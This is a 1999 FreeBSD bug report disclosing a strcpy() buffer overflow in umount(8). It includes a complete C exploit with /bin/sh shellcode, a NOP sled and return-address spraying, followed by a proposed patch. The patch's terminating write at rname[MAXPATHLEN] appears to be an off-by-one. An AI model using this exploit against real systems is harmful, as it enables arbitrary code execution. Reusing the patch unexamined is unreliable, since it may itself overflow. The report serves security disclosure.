From owner-freebsd-bugs Mon Oct 18 11:50: 5 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id EFFAF1515F for ; Mon, 18 Oct 1999 11:50:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA95884; Mon, 18 Oct 1999 11:50:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from mx1.lublin.pl (mx1.lublin.pl [212.182.63.76]) by hub.freebsd.org (Postfix) with ESMTP id 911BD14BD4 for ; Mon, 18 Oct 1999 11:45:53 -0700 (PDT) (envelope-from venglin@lubi.FreeBSD.lublin.pl) Received: from lagoon.freebsd.lublin.pl ([212.182.117.180]:7173 "HELO lagoon.FreeBSD.lublin.pl") by krupik.man.lublin.pl with SMTP id ; Mon, 18 Oct 1999 20:45:23 +0200 Received: (qmail 5416 invoked by uid 66); 18 Oct 1999 18:45:23 -0000 Received: (qmail 19841 invoked by uid 1001); 18 Oct 1999 14:41:09 -0000 Message-Id: <19991018144109.19840.qmail@lubi.FreeBSD.lublin.pl> Date: 18 Oct 1999 14:41:09 -0000 From: venglin@lubi.FreeBSD.lublin.pl Reply-To: venglin@lubi.FreeBSD.lublin.pl To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: bin/14406: [SECURITY] strcpy() buffer overflow in umount(8) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14406 >Category: bin >Synopsis: [SECURITY] strcpy() buffer overflow in umount(8) >Confidential: no >Severity: non-critical >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Oct 18 11:50:00 PDT 1999 >Closed-Date: >Last-Modified: >Originator: Przemyslaw Frasunek >Release: FreeBSD 3.2-STABLE i386 >Organization: Lublin BSD Users Group >Environment: All versions. >Description: It's possible to execute arbitrary code by overflowing buffer in umount(8). By default umount(8) is NOT installed with setuid or setgid bits set. >How-To-Repeat: /* * * (c) 1999 babcia padlina ltd. * FreeBSD /sbin/umount exploit. * */ #include #include #include #include #define NOP 0x90 #define OFS 1800 #define BUFSIZE 1024 #define ADDRS 1200 long getesp(void) { __asm__("movl %esp, %eax\n"); } int main(argc, argv) int argc; char **argv; { char *execshell = "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; char *buf, *p; int noplen, i, ofs; long ret, *ap; if(!(buf = (char *)malloc(BUFSIZE+1))) { perror("malloc()"); return -1; } if (argc > 2) ofs = atoi(argv[1]); else ofs = OFS; noplen = BUFSIZE - strlen(execshell); ret = getesp() + ofs; memset(buf, NOP, noplen); buf[noplen+1] = '\0'; strcat(buf, execshell); setenv("EGG", buf, 1); if(!(buf = (char *)malloc(ADDRS+1))) { perror("malloc()"); return -1; } p = buf; ap = (unsigned long *)p; for(i = 0; i < ADDRS / 4; i++) *ap++ = ret; p = (char *)ap; *p = '\0'; fprintf(stderr, "RET: 0x%x len: %d\n\n", ret, strlen(buf)); chmod(".", 0); // fuck da realpath()! execl("/sbin/umount", "umount", buf, 0); return 0; } >Fix: *** sbin/umount/umount.c.orig Mon Aug 3 08:44:46 1998 --- sbin/umount/umount.c Mon Oct 18 16:36:49 1999 *************** *** 215,221 **** if (realpath(name, rname) == NULL) { /* Continue and let the system call check it... */ ! strcpy(rname, name); } origname = name; --- 215,222 ---- if (realpath(name, rname) == NULL) { /* Continue and let the system call check it... */ ! strncpy(rname, name, MAXPATHLEN-1); ! rname[MAXPATHLEN] = '\0'; } origname = name; >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message